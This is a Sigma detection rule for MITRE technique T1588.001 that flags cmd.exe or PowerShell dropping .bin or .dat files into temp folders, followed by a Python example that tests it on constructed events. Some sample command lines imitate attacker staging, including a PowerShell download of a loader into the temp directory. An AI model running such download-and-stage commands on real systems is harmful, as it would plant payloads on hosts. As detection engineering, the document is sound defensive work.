title: Malware (T1588.001)
id: df00tech-t1588-001
status: experimental
description: "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities including technology companies specializing in malware development, criminal marketplaces (Malware-as-a-Service), or from individuals. Adversaries may also steal and repurpose malware from third-party entities, including other adversaries."
references:
  - https://attack.mitre.org/techniques/T1588/001/
  - https://df00tech.com/detections/T1588.001
author: df00tech
date: 2026/04/13
tags:
  - attack.resource_development
  - attack.t1588.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Partial port. The df00tech KQL/SPL query has several branches (malware family
  # names in AV/EDR alert titles, common RAT ports such as 4444, commodity packer
  # behaviour, temp-file drops). Only the temp-file-drop branch (Branch 4) fits the
  # process_creation logsource, so that is what is expressed here; the previous
  # placeholder (EventID: '*') matched every event and must not be deployed.
  selection_img:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  selection_temp:
    CommandLine|contains:
      - '\Temp\'
      - '%TEMP%'
  selection_ext:
    CommandLine|contains:
      - '.bin'
      - '.dat'
  condition: all of selection_*
falsepositives:
  # "Branch N" below refers to the branches of the df00tech KQL/SPL query.
  - "Security researchers and red team operators running authorized commodity tooling (Cobalt Strike, Metasploit) on lab or pentest endpoints; these should be covered by change tickets and originate from known source IPs"
  - "Legitimate software listening on port 4444 or other common RAT ports for non-malicious purposes (some development tools, database management suites, IoT platforms)"
  - "Antivirus/EDR vendors whose product names or detection strings mention malware family names in alert titles, triggering Branch 1 on benign informational telemetry"
  - "Automated malware analysis sandbox submissions where known samples are run in controlled environments for detection engineering or threat intelligence purposes"
  - "Binary packing and protection tools (Themida, VMProtect) used legitimately by software vendors may produce behavioural similarities to commodity packer detections"
  - "Software deployment scripts (SCCM, Intune, Ansible) dropping .bin or .dat files to temp locations via cmd.exe or PowerShell may trigger Branch 4; filter on the deployment agent's parent process"
# Lowered from high: the process_creation branch on its own is noisy (see falsepositives).
level: medium
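The following is an added worked example, not df00tech's detection code. It evaluates the Branch 4 selection (cmd.exe or powershell.exe placing a .bin/.dat file in a temp directory) over a handful of constructed process_creation events, using Sigma's matching semantics (fields within a selection are ANDed, list values are ORed, string matching is case-insensitive), and applies a parent-process filter for deployment tooling. The event records, the deployment-agent image names and the field names (Sigma process_creation / Sysmon Event ID 1 style) are assumptions made for the illustration.

```python
"""Added example: run the Branch 4 temp-drop selection over sample events.

Not df00tech's code. Events below are constructed; the deployment-tool parent
names and field names are assumptions for illustration only.
"""

# The rule's detection block as Python data (same field|modifier syntax as Sigma).
DETECTION = {
    "selection_img": {"Image|endswith": ["\\cmd.exe", "\\powershell.exe"]},
    "selection_temp": {"CommandLine|contains": ["\\Temp\\", "%TEMP%"]},
    "selection_ext": {"CommandLine|contains": [".bin", ".dat"]},
}

# Hypothetical tuning for the "software deployment scripts" false positive:
# suppress when the parent is a known deployment agent. Assumed names, not a vetted list.
DEPLOYMENT_PARENTS = ("\\ccmexec.exe", "\\intunemanagementextension.exe")


def _match_field(event, key, values):
    """Return True if the event field satisfies any of the values (OR) under the modifier."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()  # Sigma string matching is case-insensitive
    for value in values:
        value = value.lower()
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "startswith" and actual.startswith(value):
            return True
        if modifier == "contains" and value in actual:
            return True
        if modifier == "" and actual == value:
            return True
    return False


def selection_matches(event, selection):
    """All fields of one selection must match (AND); list values are alternatives (OR)."""
    return all(
        _match_field(event, key, values if isinstance(values, list) else [values])
        for key, values in selection.items()
    )


def is_suspicious_drop(event):
    """condition: all of selection_*  (plus the assumed deployment-parent filter)."""
    if not all(selection_matches(event, sel) for sel in DETECTION.values()):
        return False
    parent = str(event.get("ParentImage", "")).lower()
    return not parent.endswith(DEPLOYMENT_PARENTS)


def run(events):
    """Return the ids of events the rule would alert on."""
    return [e["id"] for e in events if is_suspicious_drop(e)]


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {   # e1: Office child shell copying a .bin into the user's temp dir -> alert
        "id": "e1",
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r"cmd.exe /c copy \\fileshare\tools\upd.bin C:\Users\bob\AppData\Local\Temp\upd.bin",
    },
    {   # e2: same intent, but the path is written as $env:TEMP -> the literal
        #     '\Temp\' never appears in CommandLine, so this branch misses it
        "id": "e2",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -c "iwr http://example.invalid/l -OutFile $env:TEMP\loader.dat"',
    },
    {   # e3: deployment agent staging a .bin via cmd.exe -> suppressed by the parent filter
        "id": "e3",
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "CommandLine": r"cmd.exe /c copy C:\Windows\ccmcache\a1\fw.bin C:\Windows\Temp\fw.bin",
    },
    {   # e4: unrelated process, fails selection_img
        "id": "e4",
        "Image": r"C:\Windows\explorer.exe",
        "ParentImage": r"C:\Windows\System32\userinit.exe",
        "CommandLine": r"C:\Windows\Explorer.EXE",
    },
    {   # e5: PowerShell writing a .dat into the system temp dir -> alert
        "id": "e5",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -NoP -c [IO.File]::WriteAllBytes('C:\Windows\Temp\agent.dat',$b)",
    },
]

if __name__ == "__main__":
    print(run(SAMPLE_EVENTS))  # e1 and e5 alert; e2 is missed, e3 suppressed, e4 not in scope
```

Event e2 is the caveat worth keeping in mind: the selection keys on the literal strings `\Temp\` and `%TEMP%` in the command line, so a drop addressed through `$env:TEMP`, a short 8.3 path or a variable expanded later in the script is not seen by this branch. Covering those cases needs file-creation telemetry (Sysmon Event ID 11 or equivalent) rather than more command-line substrings.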
